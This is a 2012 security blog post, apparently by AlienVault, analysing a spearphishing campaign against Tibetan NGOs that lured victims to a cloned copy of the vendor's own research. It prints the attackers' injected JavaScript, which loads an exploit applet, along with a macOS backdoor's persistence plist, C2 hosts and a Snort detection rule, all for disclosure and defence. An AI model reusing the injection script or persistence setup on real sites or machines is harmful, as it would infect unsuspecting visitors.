AlienVault Tibet related Research now used to target Tibetan non-governmental organizations

March 19, 2012 | Jaime Blasco
X

Get the latest security news in your inbox.

Subscribe via Email

No thanks. Close this now.

A few hours ago Greg Walton posted a warning on spearphishing mails sent to non-governmental organizations related to Tibet. The content of these emails is about our previous research Targeted Attacks against Tibetan organizations.

—————Forwarded message—————

From: webmaster <[email protected]>

Date: Mon, Mar 19, 2012 at 8:20 AM

Subject: Targeted attacks against Tibet organizations

To: ......

We recently detected several targeted attacks against Tibetan activist organizations including the Central

Tibet Administration and International Campaign for Tibet, among others.

Here is one of the emails detected:

[ More information ]

It contains a link to hxxp://dns.assyra.com/ that hosts a copy of our blog post but includes some Javascript:

<script>

var emb = document.createElement(‘applet’);

emb.setAttribute(‘name’, ‘applet’);

emb.setAttribute(‘width’, ‘1’);

emb.setAttribute(‘height’, ‘1’);

emb.setAttribute(‘code’, ‘Func1.class’);

if (navigator.userAgent.indexOf(‘Win’) != -1){

emb.setAttribute('archive', 'default.jar');

}

else if (navigator.userAgent.indexOf(‘Linux’) != -1){

emb.setAttribute('archive', 'index.jar');

}

else if (navigator.userAgent.indexOf(‘Mac’) != -1){

emb.setAttribute('archive', 'index.jar')

}

document.body.appendChild(emb);

</script>

The domain shenhuawg.com is also pointing to that server.

Based on the user-agent (Mac or Windows) it loads a Java applet that exploits CVE-2011-3544.

https://www.virustotal.com/file/d4b394844e8357a15bf6e76cb15db05a8b073b026a813d11e35211bb96caad52/analysis/1332192121/

https://www.virustotal.com/file/13f596019477b51c311f19f9adc2e4f9628ad98df1a55db6c707521ed944ec90/analysis/

The attack contains malware to infect both Windows and MacOSX.

The MacOSX backdoor has 0/0 antivirus detection rate:

https://www.virustotal.com/file/143969e8eaed6269ac6c55e2a861cdde81947e7c45e5d27e939d4bbb1c9ac8cd/analysis/1332184087/

bash-3.2# nm -a file.tmp

U ___error

U ___memcpy_chk

U ___stack_chk_fail

U ___stack_chk_guard

U ___strcat_chk

0000000100000000 A __mh_execute_header

U _alarm

U _close

U _connect

U _creat

U _dup2

U _execl

U _exit

U _fork

U _gethostbyname

U _getpid

U _getpwuid

U _gettimeofday

U _getuid

U _ioctl

U _malloc

U _memcmp

U _memcpy

U _memset

U _open

U _openpty

U _putenv

U _rand

U _read

U _recv

U _select$1050

U _send

U _setsid

U _shutdown

U _signal

U _sleep

U _socket

U _strncpy

U _ttyname

U _waitpid

U _write

U dyld_stub_binder

0000000005614542 - 00 0000   OPT radr://5614542

bash-3.2# otool -L file.tmp

file.tmp:

/usr/lib/libSystem.B.dylib (compatibility version 1.0.0, current version 125.2.10)

<?xml version=“1.0” encoding=“UTF-8”?>

<!DOCTYPE plist PUBLIC “-//Apple Computer//DTD PLIST 1.0//EN” “http://www.apple.com/DTDs/PropertyList-1.0.dtd”>

<plist version=“1.0”>

<dict>

<key>Label</key>

<string>com.apple.docserver</string>

<key>Program</key>

<string>

/Library/Audio/Plug-Ins/AudioServer

</string>

<key>RunAtLoad</key>

<true/>

</dict>

</plist>

The trojan connects to the following server:

dns.assyra.com (100.42.217.73)

100.42.208.0 - 100.42.223.255

530 W. 6th St Suite 701

Los Angeles, CA

US

The domain assyra.com has been involved in several attacks during the past using Win32/Protux.

The Windows payload is detected by AVG as BackDoor.Generic15.VKZ

https://www.virustotal.com/file/5513b45a4856f7941d71cf0885380469fdc22ece101d0399baabc9bd8b5536be/analysis/

The Windows payload seems to have been created 6 days ago:

It copies itself to  “C:\WINDOWS\system32\2019\svchost .exe” and modifies HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders -> Startup to maintain persistence.

It connects to the following servers:

tibet.zyns.com (100.42.217.73)

100.42.208.0 - 100.42.223.255

530 W. 6th St Suite 701

Los Angeles, CA

US

yahoo.xxuz.com (100.42.217.91)

100.42.208.0 - 100.42.223.255

530 W. 6th St Suite 701

Los Angeles, CA

US

lyle.changeip.org (100.42.217.73)

100.42.208.0 - 100.42.223.255

530 W. 6th St Suite 701

Los Angeles, CA

US

Once it connects to one of the servers (port 8080) , it sends some information about the victim like the ComputerName using some obfuscation:

You can use the following rule to catch this traffic on your network:

alert tcp $HOME_NET any -> $EXTERNAL_NET 8080 (msg:“MALWARE WUpdater checkin”; content:”|3C|html|3E||3C|title|3E|12356|3C||2F|title|3E||3C|body|3E|”; depth:33; classtype:trojan-activity; sid:11111111111111; rev:1;)

We will publish more information about this and ongoing attacks as soon as we have more information. Stay tuned.

Update: There is another sample of BackDoor.Generic15.VKZ (222a150bf0399f23af6d59f695304610) which used 11.36.214.140 as the C&C server. Check your logs!

Jaime Blasco

About the Author: Jaime Blasco
Jaime Blasco is a renowned Security Researcher with broad experience in network security, malware analysis and incident response. At AlienVault, Jaime leads the Lab Intelligence and Research team that leads the charge of researching and integrating threat intelligence into detection mechanisms. Prior to working at AlienVault he founded a couple of startups (Eazel, Aitsec) working on web application security, source code analysis and incident response. He is based in San Francisco. Jaime's work in emerging threats and targeted attacks is frequently cited in international publications such as New York Times, BBC, Washington Post and Al Jazeera.
Read more posts from Jaime Blasco ›

TAGS:

‹ BACK TO ALL BLOGS

Watch a Demo ›
GET PRICE FREE TRIAL